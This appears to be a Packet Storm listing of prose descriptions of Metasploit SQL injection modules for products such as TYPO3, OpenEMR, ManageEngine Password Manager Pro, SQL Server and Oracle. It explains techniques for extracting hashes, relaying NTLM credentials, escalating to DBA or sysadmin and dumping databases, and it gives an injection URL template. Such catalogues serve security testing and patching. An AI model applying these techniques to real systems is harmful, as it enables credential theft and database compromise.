This Metasploit module exploits a SQL Injection vulnerability In TYPO3 NewsController.php in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection can be used to obtain password hashes for application user accounts. This Metasploit module has been tested on TYPO3 3.16.0 running news extension 5.0.0. This Metasploit module tries to extract username and password hash of the administrator user. It tries to inject sql and check every letter of a pattern, to see if it belongs to the username or password it tries to alter the ordering of results. If the letter doesnt belong to the word being extracted then all results are inverted (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs to the word being extracted then the results are in proper order (News #1 appears before News #2, so Pattern1 before Pattern2).
472f7767d1d622fc181d7fa0a90d223e85f29ef884a67376c132a17b0cf4808eThis Metasploit module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow less than or equal to v5.1.6 Build 135, by adding a new administrative user to the web interface of the application.
1156e7ce3120c4d6f108a0801b0bdca55b989aecbf8c92115bba574b28955c49This Metasploit module exploits a SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress, which allows remote attackers to extract credentials via the size parameter to get_album_item.php.
2961b2a6386f280ff2a5c8a22286ae6b39869c94cfc164ff4f01d0e67ea4a838ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate privileges and obtain Super Administrator access. A Super Administrator can then use his privileges to dump the whole password database in CSV format. PMP can use both MySQL and PostgreSQL databases but this module only exploits the latter as MySQL does not support stacked queries with Java. PostgreSQL is the default database in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL, so a higher version does not guarantee exploitability. This Metasploit module has been tested on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in v7.1 build 7105 and above.
3bb1458e9aceabbc6baaf58c805fc36d04c4e787a9a2a98f33a3d697bff053f3This Metasploit module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native "xp_dirtree" or stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the "PUBLIC" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper.
07d8028c67f4c74422fce026d3e4f7c8c01787a332652cb8847f7c5bc5571debThis Metasploit module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSER_SNAME function via Error Based SQL injection. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated accounts can then be used in online dictionary attacks. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--.
0e0cd7442b34141ce286901bcc638f36f8b80933c0544ac4a91ea1079c35aa1fThis Metasploit module can be used to escalate SQL Server user privileges to sysadmin through a web SQL Injection. In order to escalate, the database user must to have the db_owner role in a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin role, the mssql_payload_sqli module can be used to obtain a shell on the system. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--.
2281ffe74b82b6590851bcfd613e9b6b34e0e85e927c0a4615fce7723f578db3This Metasploit module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user via error based SQL injection. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--.
d50e06d93b9cce5b4eedb05759e46b1ef7a302db4d0689fb0404c274fc0ff5d2This Metasploit module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This Metasploit module can be used to extract the site and project usernames and hashes.
08cbf9636cf1774ffb0ae21e481e4e9ea1bc079a6c23430561e43b5bfd796d44This Metasploit module exploits a SQL injection vulnerability found in OpenEMR versions 5.0.1 Patch 6 and lower. The vulnerability allows the contents of the entire database (with exception of log and task tables) to be extracted. This Metasploit module saves each table as a .csv file in your loot directory and has been tested with OpenEMR 5.0.1.
066eeb43c6b2d8cd952b1105cfaa25528d4595e183b0c2660a66717e9f8a976cThis Metasploit module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
91a0457e6fc1353dda1d938850804c7fbf4f3873992700b019c47715d498af97The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.
531bca332b7b8919c806ed365e8ad1c5e5000249344fccaf602038718feac7e5This Metasploit module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.
47ba8aeb06908edd303259a2080cba7efcaa98f8f66c52b0fa64a15448287fe5This Metasploit module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.OPEN package/function.
f6664ac501c9f358d8d4a9410aab3c277a77640982c29a4ac936ead1bc75e8b3The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.
7e5369ebdc4bfc61aa262475859d683b00bf47b5e34f9da7b3872e8242c9834cThis Metasploit module exploits a sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
27f5ae57e22ed3cfd2e38c06ca48a65e3dfb8c76f9cc56d51d4721d34c60da9cThis Metasploit module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This Metasploit module has been tested against 9i, 10gR1 and 10gR2.
45e22b08a22f5b9b513570650ac77c9b7cf896df1dddb9d97cc0659722506344This Metasploit module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function.
345c6446dfe846a011460df72073d8ff0549b8076c977837fb20c1f2ddb07dd3This Metasploit module exploits an sql injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
8d3bbc62256bcef0370fd324d79badfe6dada95158c7b728fcf20137808677d2This Metasploit module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.
c969f6f19cf659e35b78bffa83fbc8e8694a50647075c02b8636a5ef97eb6c17This Metasploit module exploits a sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
ccfe06863fa08c66b4bb04f888a3c40c6a7660aa2a9948479455b087d102bc4dThis Metasploit module exploits a sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
25265a201b6de9b641b309ca9d9e2f86d75f62ec4113d2e80983a1052506dbe8This Metasploit module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and 10g up to 10.1.0.4.
dc9b1de7a0efe0b6df96fb180a6432e4861fefcaaceb66899e1acdd5821ec707The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.
14b30e15660808395b533ff80a789b56b79cedf1bffaa219897f461a53b655dcThe module exploits an sql injection flaw in the CREATE_CHANGE_SET procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.
26ed86f78f01db48be7f14a8b9f1b9fec76717709540eee30aa0dfa68088569f
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed